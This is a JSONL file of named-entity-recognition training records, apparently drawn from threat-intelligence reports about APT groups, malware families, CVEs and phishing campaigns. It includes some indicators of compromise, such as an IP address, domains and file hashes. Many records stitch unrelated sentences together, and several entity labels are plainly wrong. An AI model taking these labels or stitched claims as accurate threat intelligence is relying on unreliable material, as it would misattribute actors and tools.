{"text": "Typically , APT10 tends to employ a namesquatting scheme in their domains that aims to confuse the observer by posing as a legitimate domain . This sample was also found to be deployed using the CVE-2012-0158 vulnerability .", "spans": {"THREAT_ACTOR: APT10": [[12, 17]], "VULNERABILITY: CVE-2012-0158": [[195, 208]]}, "info": {"id": "cyberner_stix_train_006607", "source": "cyberner_stix_train"}}
{"text": "] 6 , was previously hosting the domain next.nextuptravel [ . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe . Poison Ivy includes features common to most Windows-based RATs , including key logging , screen capturing , video capturing , file transfers , system administration , password theft , and traffic relaying .", "spans": {"MALWARE: Mimikatz Lite": [[187, 200]], "MALWARE: GetPassword.exe": [[204, 219]], "MALWARE: Poison Ivy": [[222, 232]], "SYSTEM: Windows-based": [[266, 279]], "MALWARE: RATs": [[280, 284]]}, "info": {"id": "cyberner_stix_train_006608", "source": "cyberner_stix_train"}}
{"text": "The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April . The Turla group is known to be painstaking and work in stages , first doing reconnaissance on their victims' systems before deploying their most sophisticated tools such as Carbon .", "spans": {"VULNERABILITY: SMBv1 exploit": [[22, 35]], "THREAT_ACTOR: Shadow Brokers": [[79, 93]], "THREAT_ACTOR: threat group": [[94, 106]], "THREAT_ACTOR: Turla": [[122, 127]], "MALWARE: Carbon": [[291, 297]]}, "info": {"id": "cyberner_stix_train_006609", "source": "cyberner_stix_train"}}
{"text": "The malware samples were mainly distributed through a series of malicious subdomains registered under a legitimate domain belonging to a well-known shared hosting service provider in Russia . PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload . Ssdeep : 768:u0foGtYZKQ5QZJQ6hKVsEEIHNDxpy3TI3dU4DKfLX9Eir : uG1aKQ5OwCrItq3TgGfLt9r . It now appears those attacks were perpetrated by Harrison , who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw , his then - girlfriend and their friends .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[192, 202]], "THREAT_ACTOR: NEODYMIUM": [[207, 216]], "VULNERABILITY: zero-day exploit": [[229, 245]], "TOOL: Ssdeep": [[299, 305]], "THREAT_ACTOR: Harrison": [[435, 443]]}, "info": {"id": "cyberner_stix_train_006610", "source": "cyberner_stix_train"}}
{"text": "Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak . The FBI said the \" group of malicious cyber actors \" ( known as APT6 or 1.php ) used dedicated top-level domains in conjunction with the command and control servers to deliver \" customized malicious software \" to government computer systems .", "spans": {"ORGANIZATION: Kaspersky Lab": [[15, 28], [156, 169]], "VULNERABILITY: zero-day": [[94, 102]], "ORGANIZATION: FBI": [[206, 209]], "THREAT_ACTOR: APT6": [[266, 270]], "FILEPATH: 1.php": [[274, 279]], "MALWARE: customized malicious software": [[380, 409]]}, "info": {"id": "cyberner_stix_train_006611", "source": "cyberner_stix_train"}}
{"text": "The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes . After reestablishing access , the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used .", "spans": {"MALWARE: gsecudmp": [[210, 218]], "MALWARE: WCE": [[223, 226]], "THREAT_ACTOR: TG-3390": [[272, 279]]}, "info": {"id": "cyberner_stix_train_006612", "source": "cyberner_stix_train"}}
{"text": "This change came hand in hand with a new overlay target list , no longer targeting social apps , but focusing on banking instead . we assess with high confidence that these incidents were conducted by APT10 also known as Stone Panda , menuPass , CVNX in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage . We have observed that the adversary has repeatedly attacked a high-profile target in Japan using multiple malware families for the last three years .", "spans": {"THREAT_ACTOR: APT10": [[201, 206]], "THREAT_ACTOR: Stone Panda": [[221, 232]], "THREAT_ACTOR: menuPass": [[235, 243]], "THREAT_ACTOR: CVNX": [[246, 250]], "MALWARE: malware families": [[469, 485]]}, "info": {"id": "cyberner_stix_train_006613", "source": "cyberner_stix_train"}}
{"text": "This is done using a series of syscalls as outlined below . The attackers try to lure targets through spear phishing emails that include compressed executables . They simply use the website for legitimate purposes , such as posting forum threads or creating profile pages . If the target system meets the pre - defined requirements , the malware will use Twitter ( unbeknownst to the user ) and start looking for specific tweets from pre - made accounts .", "spans": {}, "info": {"id": "cyberner_stix_train_006614", "source": "cyberner_stix_train"}}
{"text": "This spyware sample communicates over dynamic DNS . this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . Night Dragon is a campaign name for activity involving a threat group that has conducted activity originating primarily in China .", "spans": {"MALWARE: RTF": [[57, 60]], "VULNERABILITY: CVE-2017_1882": [[80, 93]], "MALWARE: eqnedt32.exe": [[97, 109]], "THREAT_ACTOR: Night Dragon": [[112, 124]]}, "info": {"id": "cyberner_stix_train_006615", "source": "cyberner_stix_train"}}
{"text": "Of the 195 functions of the new sample , 149 are strictly identical , 16 match at 90% and 2 match at 80% .", "spans": {}, "info": {"id": "cyberner_stix_train_006616", "source": "cyberner_stix_train"}}
{"text": "The server sends back encoded json containing URL , class name and method name . Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office . The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon .", "spans": {"VULNERABILITY: CVE-2017-11882": [[118, 132]], "THREAT_ACTOR: actors": [[167, 173]], "VULNERABILITY: (CVE-2017-11882)": [[227, 243]], "FILEPATH: .exe file": [[290, 299]], "FILEPATH: Microsoft Word file": [[327, 346]]}, "info": {"id": "cyberner_stix_train_006617", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have observed the threat actors installing a credential logger and backdoor on Microsoft Exchange servers , which requires a technical grasp of Internet Information Services ( IIS ) .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "ORGANIZATION: Microsoft": [[95, 104]], "TOOL: Exchange": [[105, 113]], "TOOL: Internet Information Services": [[160, 189]], "TOOL: IIS": [[192, 195]]}, "info": {"id": "cyberner_stix_train_006618", "source": "cyberner_stix_train"}}
{"text": "Playing further off the suggested GAS Tecnologia link , the app promises better security for its users . TA505 is also using FlowerPippi (Backdoor.Win32.FLOWERPIPPI.A) , a new backdoor that we found them using in their campaigns against targets in Japan , India , and Argentina . Regardless of their sophistication or refinement , the malware families within the Lazarus Group 's India and Lima classes perform at a reasonable level for their designed purpose : the introduction and persistence of malware from the Lazarus Group on a victim 's infrastructure .", "spans": {"SYSTEM: GAS Tecnologia": [[34, 48]], "THREAT_ACTOR: TA505": [[105, 110]], "TOOL: FlowerPippi": [[125, 136]], "TOOL: backdoor": [[176, 184]], "THREAT_ACTOR: Lazarus Group": [[363, 376], [515, 528]]}, "info": {"id": "cyberner_stix_train_006619", "source": "cyberner_stix_train"}}
{"text": "Encounter In early 2019 , the Check Point Research team observed a surge of Android malware attack attempts against users in India which had strong characteristics of Janus vulnerability abuse ; All samples our team collected during preliminary investigation had the ability to hide their app icons and claim to be Google related updaters or vending modules ( a key component of Google Play framework ) . Threat actors have delivered Bookworm as a payload in attacks on targets in Thailand . All 13 countries where Kaspersky reportedly observed BlackOasis activity are connected to Saudi Arabia in one of three ways : economically ; from a national security perspective ; or due to established policy agreements . WIRTE has used HTTPS over ports 2083 and 2087 for C2.ZxShell can use ports 1985 and 1986 in HTTP / S communication.[47 ] Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level .", "spans": {"ORGANIZATION: Check Point": [[30, 41]], "SYSTEM: Android": [[76, 83]], "VULNERABILITY: Janus": [[167, 172]], "ORGANIZATION: Google": [[315, 321]], "SYSTEM: Google Play": [[379, 390]], "TOOL: Bookworm": [[434, 442]], "ORGANIZATION: Kaspersky": [[515, 524]], "THREAT_ACTOR: BlackOasis": [[545, 555]], "MALWARE: WIRTE": [[714, 719]], "SYSTEM: HTTPS": [[729, 734]], "MALWARE: C2.ZxShell": [[764, 774]]}, "info": {"id": "cyberner_stix_train_006620", "source": "cyberner_stix_train"}}
{"text": "Such a framework typically consists of five elements :", "spans": {}, "info": {"id": "cyberner_stix_train_006621", "source": "cyberner_stix_train"}}
{"text": "Ultimately , APT35 had used access to hundreds of mailboxes to read email communications and steal data related to Middle East organizations , which later became victims of destructive attacks . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 .", "spans": {"THREAT_ACTOR: APT35": [[13, 18]], "ORGANIZATION: email communications": [[68, 88]], "FILEPATH: malicious.DOC": [[281, 294]], "VULNERABILITY: exploit": [[304, 311]], "ORGANIZATION: Microsoft": [[314, 323]], "TOOL: Common Controls": [[324, 339]], "VULNERABILITY: vulnerability": [[340, 353]], "VULNERABILITY: CVE-2012-0158": [[356, 369]]}, "info": {"id": "cyberner_stix_train_006622", "source": "cyberner_stix_train"}}
{"text": "Attackers send a spear phishing email to employees at the target organization .", "spans": {"TOOL: email": [[32, 37]]}, "info": {"id": "cyberner_stix_train_006623", "source": "cyberner_stix_train"}}
{"text": "Shamoon2 : 5.254.100.200 Shamoon2 : URLs .", "spans": {"MALWARE: Shamoon2": [[0, 8], [25, 33]], "IP_ADDRESS: 5.254.100.200": [[11, 24]], "TOOL: URLs": [[36, 40]]}, "info": {"id": "cyberner_stix_train_006624", "source": "cyberner_stix_train"}}
{"text": "All modules set hidden attributes to their files : Module Paths Exfiltrated data format msconf.exe % APPDATA % /myupd/gen/ % Y % m % d- % H % M % S_filesystem.zip ( file structure dump ) system.exe % APPDATA % /myupd/aud/ % d % m % Y % H % M % S.wav ( surrounding sounds ) update.exe % APPDATA % /myupd_tmp/txt/ % APPDATA % /myupd/txt/ % Y % m In theory , Shun Wang Technologies could have collected a third of China’s population names and contact numbers if not more . FIN6 : ITG08 .", "spans": {"THREAT_ACTOR: Shun Wang": [[356, 365]], "THREAT_ACTOR: FIN6": [[470, 474]], "THREAT_ACTOR: ITG08": [[477, 482]]}, "info": {"id": "cyberner_stix_train_006625", "source": "cyberner_stix_train"}}
{"text": "They also download apks secretly and record audios and videos , then upload users’ privacy information to server , causing users’ privacy leakage . Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system .", "spans": {"MALWARE: They": [[0, 4]], "THREAT_ACTOR: OilRig": [[213, 219]], "FILEPATH: Clayslide delivery documents": [[227, 255]]}, "info": {"id": "cyberner_stix_train_006626", "source": "cyberner_stix_train"}}
{"text": "drivres-update.info softupdates.info The module uses a hardcoded URL ( “ /check/ “ ) for sending HTTP POST requests to its C2 servers .", "spans": {"DOMAIN: drivres-update.info": [[0, 19]], "DOMAIN: softupdates.info": [[20, 36]], "TOOL: C2": [[123, 125]]}, "info": {"id": "cyberner_stix_train_006627", "source": "cyberner_stix_train"}}
{"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . Black Lambert was seen only briefly and we assume it was \" retired \" from the arsenal after being discovered by FireEye in 2014 .", "spans": {"MALWARE: documents": [[4, 13]], "VULNERABILITY: CVE-2012-0158": [[97, 110]], "VULNERABILITY: Microsoft Word vulnerabilities": [[166, 196]], "MALWARE: Black Lambert": [[241, 254]], "ORGANIZATION: FireEye": [[353, 360]]}, "info": {"id": "cyberner_stix_train_006628", "source": "cyberner_stix_train"}}
{"text": "UNBLOCK – unblock the telephone ( revoke device administrator privileges from the app ) . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East . The researchers found that there are common elements in the macro and in the first- stage RAT used in this campaign , with former campaigns of the NICKEL ACADEMY ( Lazarus ) threat group .", "spans": {"THREAT_ACTOR: attackers": [[94, 103]], "MALWARE: XLS files": [[150, 159]], "ORGANIZATION: employees working in the banking sector": [[163, 202]], "MALWARE: RAT": [[314, 317]], "THREAT_ACTOR: NICKEL ACADEMY": [[371, 385]], "THREAT_ACTOR: Lazarus": [[388, 395]]}, "info": {"id": "cyberner_stix_train_006629", "source": "cyberner_stix_train"}}
{"text": "The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes . APT33 sent spear phishing emails to employees whose jobs related to the aviation industry .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[28, 41]], "ORGANIZATION: Uyghur": [[66, 72]], "ORGANIZATION: Tibetan activists": [[77, 94]], "THREAT_ACTOR: APT33": [[149, 154]], "TOOL: emails": [[175, 181]], "ORGANIZATION: employees": [[185, 194]], "ORGANIZATION: aviation industry": [[221, 238]]}, "info": {"id": "cyberner_stix_train_006630", "source": "cyberner_stix_train"}}
{"text": "Th 64KB buffer is used as a VM descriptor data structure to store data and the just-in-time ( JIT ) generated code to run . Based on the targeting and lures , Unit 42 assesses that the Lotus Blossom actors ' collection requirements include militaries and government agencies in Southeast Asia . Early in the payload , the malware checks to see if the system language is Russian or Chinese . e.g. , uses character as a separator and that contains valid IP list uses as a separator .", "spans": {"ORGANIZATION: Unit 42": [[159, 166]], "THREAT_ACTOR: Lotus Blossom actors": [[185, 205]], "ORGANIZATION: militaries": [[240, 250]], "ORGANIZATION: government agencies": [[255, 274]]}, "info": {"id": "cyberner_stix_train_006631", "source": "cyberner_stix_train"}}
{"text": "We believe this HTTP GET request was the actor visiting the webshell after exploitation and prior to executing commands .", "spans": {}, "info": {"id": "cyberner_stix_train_006632", "source": "cyberner_stix_train"}}
{"text": "The following is a summary of observed WINDSHIFT activity which targeted a Middle Eastern government agency . We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit .", "spans": {"ORGANIZATION: government agency": [[90, 107]], "VULNERABILITY: CVE-2013-0640": [[174, 187]], "MALWARE: MiniDuke": [[198, 206]], "VULNERABILITY: zero-day": [[260, 268]], "VULNERABILITY: exploit": [[309, 316]]}, "info": {"id": "cyberner_stix_train_006633", "source": "cyberner_stix_train"}}
{"text": "XLoader Disguises as Android Apps , Has FakeSpy Links This new XLoader variant poses as a security app for Android devices , and uses a malicious iOS profile to affect iPhone and iPad devices . In March 2014 , the group leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank . Name Delivery Server . COSMICENERGY is the latest example of specialized OT malware capable of causing cyber physical impacts , which are rarely discovered or disclosed .", "spans": {"MALWARE: XLoader": [[0, 7], [63, 70]], "SYSTEM: Android": [[21, 28], [107, 114]], "MALWARE: FakeSpy": [[40, 47]], "SYSTEM: iOS": [[146, 149]], "SYSTEM: iPhone": [[168, 174]], "SYSTEM: iPad": [[179, 183]], "THREAT_ACTOR: group": [[214, 219]], "ORGANIZATION: government": [[294, 304]], "ORGANIZATION: think tank": [[347, 357]], "MALWARE: COSMICENERGY": [[383, 395]], "MALWARE: specialized OT malware": [[421, 443]]}, "info": {"id": "cyberner_stix_train_006634", "source": "cyberner_stix_train"}}
{"text": "We’ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . Bahamut targeted similar Qatar-based individuals during their campaign .", "spans": {"THREAT_ACTOR: BalkanDoor": [[34, 44]], "VULNERABILITY: CVE-2018-20250": [[134, 148]], "THREAT_ACTOR: Bahamut": [[151, 158]]}, "info": {"id": "cyberner_stix_train_006635", "source": "cyberner_stix_train"}}
{"text": "Oftentimes , the emailed link is a bit.ly shortened link , used to potentially evade detection . The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file , and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script . Equation is a sophisticated threat group that employs multiple remote access tools .", "spans": {"THREAT_ACTOR: attackers": [[101, 110]], "THREAT_ACTOR: Equation": [[346, 354]], "MALWARE: remote access tools": [[409, 428]]}, "info": {"id": "cyberner_stix_train_006636", "source": "cyberner_stix_train"}}
{"text": "It leverages webinjects and SMS reading capabilities to bypass two-factor authentication , and is clearly targeting financial applications . In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . As a result of our analysis of APT10 's activities , we believe that it almost certainly benefits from significant staffing and logistical resources , which have increased over the last three years , with a significant step-change in 2016 .", "spans": {"VULNERABILITY: UNITEDRAKE NSA exploit": [[187, 209]], "THREAT_ACTOR: APT10": [[393, 398]]}, "info": {"id": "cyberner_stix_train_006637", "source": "cyberner_stix_train"}}
{"text": "In this version of Rotexy , dynamic generation of lowest-level domains was not used . The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period . FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation .", "spans": {"MALWARE: Rotexy": [[19, 25]], "THREAT_ACTOR: Leviathan": [[90, 99]], "MALWARE: macro-laden Microsoft Word documents": [[123, 159]], "ORGANIZATION: development organizations": [[192, 217]], "ORGANIZATION: FBI": [[239, 242]], "THREAT_ACTOR: HIDDEN COBRA actors": [[268, 287]]}, "info": {"id": "cyberner_stix_train_006638", "source": "cyberner_stix_train"}}
{"text": "Reports indicate fake versions of the Amaq app exist , likely in order to spy on those that use it . APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage operations in what appears to be activity that falls outside the scope of state-sponsored missions . APT19 seemed to be going after defense sector firms , Chinese dissident groups and other political target , as well as certain financial targets and other commercial targets in pharmaceutical and energy sectors that could benefit the Chinese economy .", "spans": {"SYSTEM: Amaq": [[38, 42]], "THREAT_ACTOR: APT41": [[101, 106]], "THREAT_ACTOR: APT19": [[324, 329]], "ORGANIZATION: defense sector firms": [[355, 375]], "ORGANIZATION: political": [[413, 422]], "ORGANIZATION: financial": [[451, 460]], "ORGANIZATION: commercial": [[479, 489]], "ORGANIZATION: pharmaceutical": [[501, 515]], "ORGANIZATION: energy sectors": [[520, 534]]}, "info": {"id": "cyberner_stix_train_006639", "source": "cyberner_stix_train"}}
{"text": "This entry was posted on Thu Dec 14 10:00 EST 2017 and filed under Malware , Nathan Brubaker , Christopher Glyer , Blake Johnson , Dan Caban , Marina Krotofil , ICS Security , and Dan Scali . The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period .", "spans": {"ORGANIZATION: ICS Security": [[161, 173]], "THREAT_ACTOR: Leviathan": [[196, 205]], "FILEPATH: macro-laden Microsoft Word documents": [[229, 265]], "ORGANIZATION: development organizations": [[298, 323]]}, "info": {"id": "cyberner_stix_train_006640", "source": "cyberner_stix_train"}}
{"text": "This allows the PHA authors to monetize their apps more effectively than through regular advertising . Obviously , the developers behind NetTraveler have taken steps to try to hide the malware 's configuration . Since 1949 , Beijing has claimed Taiwan as a part of China and strongly opposes any action toward independence . The U.S. Cybersecurity and Infrastructure Security Agency ( CISA ) released a detailed timeline on the campaign , stating that an investigation from Microsoft revealed that “ advanced persistent threat ( APT ) actors accessed and exfiltrated unclassified Exchange Online Outlook data ” after users reported suspicious activities in their Microsoft 365 cloud environment .", "spans": {"TOOL: NetTraveler": [[137, 148]], "ORGANIZATION: U.S. Cybersecurity and Infrastructure Security Agency ( CISA )": [[329, 391]], "ORGANIZATION: Microsoft": [[474, 483]], "THREAT_ACTOR: advanced persistent threat ( APT ) actors": [[500, 541]], "SYSTEM: Microsoft 365 cloud environment": [[663, 694]]}, "info": {"id": "cyberner_stix_train_006641", "source": "cyberner_stix_train"}}
{"text": "The group demonstrates malleability and innovation in maintaining and producing familiar SPLM functionality , but the pragmatic and systematic approach towards producing undetected or difficult-to-detect malware continues .", "spans": {"MALWARE: SPLM": [[89, 93]]}, "info": {"id": "cyberner_stix_train_006642", "source": "cyberner_stix_train"}}
{"text": "Based on these and other similar stylistic differences observed between CozyDuke and its older siblings , we speculate that while the older Duke families appear to be the work of someone with a background in malware writing ( or at the least in hacking ) , CozyDuke ’s author or authors more likely came from a software development background .", "spans": {"MALWARE: CozyDuke": [[72, 80], [257, 265]], "THREAT_ACTOR: Duke": [[140, 144]]}, "info": {"id": "cyberner_stix_train_006643", "source": "cyberner_stix_train"}}
{"text": "But , behind the scenes , the malware has not been removed ; instead it starts preparing its onslaught of attacks . In total , Silence sent out about 80 , 000 emails , with more than half of them targeting Taiwan , Malaysia , and South Korea . The Charming Kitten' focus appears to be individuals of interest to Iran in the fields of academic research .", "spans": {"THREAT_ACTOR: Silence": [[127, 134]], "THREAT_ACTOR: Charming Kitten'": [[248, 264]], "ORGANIZATION: academic research": [[334, 351]]}, "info": {"id": "cyberner_stix_train_006644", "source": "cyberner_stix_train"}}
{"text": "The threat actors used social engineering to convince users to run an embedded macro in a Microsoft Word document that launched a malicious PowerShell payload .", "spans": {"THREAT_ACTOR: The threat actors": [[0, 17]], "TOOL: social engineering": [[23, 41]], "MALWARE: macro": [[79, 84]], "TOOL: Microsoft Word document": [[90, 113]], "MALWARE: malicious PowerShell payload": [[130, 158]]}, "info": {"id": "cyberner_stix_train_006645", "source": "cyberner_stix_train"}}
{"text": "We initially reported on this threat group and their UPDATESEE malware in our FireEye Intelligence Center in February 2016 . Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": {"TOOL: UPDATESEE malware": [[53, 70]], "ORGANIZATION: FireEye Intelligence": [[78, 98]], "THREAT_ACTOR: attackers": [[139, 148]], "FILEPATH: MS PowerPoint document": [[157, 179]], "VULNERABILITY: CVE-2014-6352": [[205, 218]]}, "info": {"id": "cyberner_stix_train_006646", "source": "cyberner_stix_train"}}
{"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence .", "spans": {"ORGANIZATION: CSIS": [[50, 54]], "VULNERABILITY: Carbanak": [[88, 96]], "THREAT_ACTOR: APT41": [[148, 153]], "VULNERABILITY: exploit": [[190, 197]], "VULNERABILITY: CVE-2019-3396": [[207, 220]]}, "info": {"id": "cyberner_stix_train_006647", "source": "cyberner_stix_train"}}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . The attack leveraged malware we called ' BlackLambert ' , which was used to target a high profile organization in Europe .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "ORGANIZATION: customers": [[187, 196]], "MALWARE: BlackLambert": [[240, 252]], "ORGANIZATION: high profile organization": [[284, 309]]}, "info": {"id": "cyberner_stix_train_006648", "source": "cyberner_stix_train"}}
{"text": "Moreover , the backdoor contains a list of filenames related to credentials from software listed below ( database names ) :", "spans": {}, "info": {"id": "cyberner_stix_train_006649", "source": "cyberner_stix_train"}}
{"text": "An interesting feature of this family of banking Trojans is the simultaneous use of three command sources : Google Cloud Messaging ( GCM ) service – used to send small messages in JSON format to a mobile device via Google servers ; malicious C & C server ; incoming SMS messages . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" . Lazarus actors commonly maintain persistence on a victim 's system by installing the malware-as-a-service .", "spans": {"THREAT_ACTOR: APT32": [[291, 296]], "MALWARE: Vietnam.exe": [[395, 406]], "THREAT_ACTOR: Lazarus actors": [[411, 425]]}, "info": {"id": "cyberner_stix_train_006650", "source": "cyberner_stix_train"}}
{"text": "Again , much of the modification work focused on removing redundant code in an attempt to appear different from earlier versions of the loader .", "spans": {}, "info": {"id": "cyberner_stix_train_006651", "source": "cyberner_stix_train"}}
{"text": "WRITE_EXTERNAL_STORAGE - Allows the application to write to external storage . Several spear-phishing campaigns attributed to Carbanak , all occurring between March and May 2018 , were analyzed by security researchers in 2018 . The crew combines both regular crime and targeted attack objectives using the same domain infrastructure over time , rarely changing their TTPs .", "spans": {"THREAT_ACTOR: Carbanak": [[126, 134]], "MALWARE: domain infrastructure": [[311, 332]]}, "info": {"id": "cyberner_stix_train_006652", "source": "cyberner_stix_train"}}
{"text": "While the stolen certificates were different , and stolen in separate instances , they were both used with custom malware in targeted attacks originating from China .", "spans": {}, "info": {"id": "cyberner_stix_train_006653", "source": "cyberner_stix_train"}}
{"text": "IOCS Hashes 139edb1bc033725539b117f50786f3d3362ed45845c57fe1f82e7ed72b044367 e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 e5f346d8f312cc1f93c2c6af611e2f50805c528934786ea173cabc6a39b14cda This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics . APT12 . Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": {"MALWARE: document": [[277, 285]], "THREAT_ACTOR: APT12": [[415, 420]], "SYSTEM: WebDav server": [[537, 550]], "MALWARE: NetSupport RAT": [[562, 576]]}, "info": {"id": "cyberner_stix_train_006654", "source": "cyberner_stix_train"}}
{"text": "The MiniDuke toolset consists of multiple downloader and backdoor components , which are commonly referred to as the MiniDuke “ stage 1 ” , “ stage 2 ” , and “ stage 3 ” components as per Kaspersky ’s original MiniDuke whitepaper .", "spans": {"MALWARE: MiniDuke": [[4, 12], [117, 125], [210, 218]]}, "info": {"id": "cyberner_stix_train_006655", "source": "cyberner_stix_train"}}
{"text": "Since releasing our 2014 report , we continue to assess that APT28 is sponsored by the Russian Government .", "spans": {"THREAT_ACTOR: APT28": [[61, 66]]}, "info": {"id": "cyberner_stix_train_006656", "source": "cyberner_stix_train"}}
{"text": "Threat actors used different websites to host different payloads at different times . On January 8 , 2018 , Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East . In the three documents , an additional Office document containing a Macro is downloaded and executed . Based on these findings , CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022 - 41080 .", "spans": {"ORGANIZATION: Unit 42": [[108, 115]], "THREAT_ACTOR: OilRig": [[129, 135]], "THREAT_ACTOR: threat group": [[136, 148]], "ORGANIZATION: insurance agency": [[175, 191]], "TOOL: Office document": [[258, 273]], "TOOL: Macro": [[287, 292]], "VULNERABILITY: CVE-2022 - 41080": [[440, 456]]}, "info": {"id": "cyberner_stix_train_006657", "source": "cyberner_stix_train"}}
{"text": "The json format is typically { “mth ” :", "spans": {"TOOL: json": [[4, 8]]}, "info": {"id": "cyberner_stix_train_006658", "source": "cyberner_stix_train"}}
{"text": "And this just means attackers will continue to be successful . Machete is interested in files that describe navigation routes and positioning using military grids . In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank .", "spans": {"THREAT_ACTOR: Machete": [[63, 70]], "ORGANIZATION: describe navigation routes": [[99, 125]], "THREAT_ACTOR: APT38": [[185, 190]], "MALWARE: NESTEGG": [[200, 207]], "MALWARE: KEYLIME": [[227, 234]], "MALWARE: keylogger": [[239, 248]], "ORGANIZATION: bank": [[338, 342]]}, "info": {"id": "cyberner_stix_train_006659", "source": "cyberner_stix_train"}}
{"text": "Another lull in November 2016 saw the complete absence of Locky and Dridex , while high-volume campaigns reappeared in December , albeit at lower volumes than during the Q3 2016 peak .", "spans": {"MALWARE: Locky": [[58, 63]], "MALWARE: Dridex": [[68, 74]]}, "info": {"id": "cyberner_stix_train_006660", "source": "cyberner_stix_train"}}
{"text": "Most of the Equation Group 's targets have been in Iran , Russia , Pakistan , Afghanistan , India , Syria , and Mali . However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others .", "spans": {"THREAT_ACTOR: Equation Group": [[12, 26]], "TOOL: emails": [[143, 149]], "ORGANIZATION: bank employees": [[163, 177]]}, "info": {"id": "cyberner_stix_train_006661", "source": "cyberner_stix_train"}}
{"text": "Keylogger log location : Users\\hJTQwqwwSCkZU\\AppData\\Roaming\\GoogleDesktop\\<date> .", "spans": {}, "info": {"id": "cyberner_stix_train_006662", "source": "cyberner_stix_train"}}
{"text": "The phone number is fetched from a response from the C & C server and is stored in str3 variable , which further is utilized using the tel : function . Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers . The group has been active since at least 2010 and has targeted organizations in the aerospace , government , defense , technology energy , and manufacturing sectors .", "spans": {"MALWARE: EternalRomance": [[177, 191]], "MALWARE: EternalSynergy": [[205, 219]], "MALWARE: CVE-2017-0143": [[238, 251]], "ORGANIZATION: aerospace": [[434, 443]], "ORGANIZATION: government": [[446, 456]], "ORGANIZATION: defense": [[459, 466]], "ORGANIZATION: technology": [[469, 479]], "ORGANIZATION: energy": [[480, 486]], "ORGANIZATION: manufacturing sectors": [[493, 514]]}, "info": {"id": "cyberner_stix_train_006663", "source": "cyberner_stix_train"}}
{"text": "This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills . DoublePulsar is then used to inject a secondary payload , which runs in memory only .", "spans": {"THREAT_ACTOR: Scattered Canary": [[75, 91]], "FILEPATH: DoublePulsar": [[136, 148]]}, "info": {"id": "cyberner_stix_train_006664", "source": "cyberner_stix_train"}}
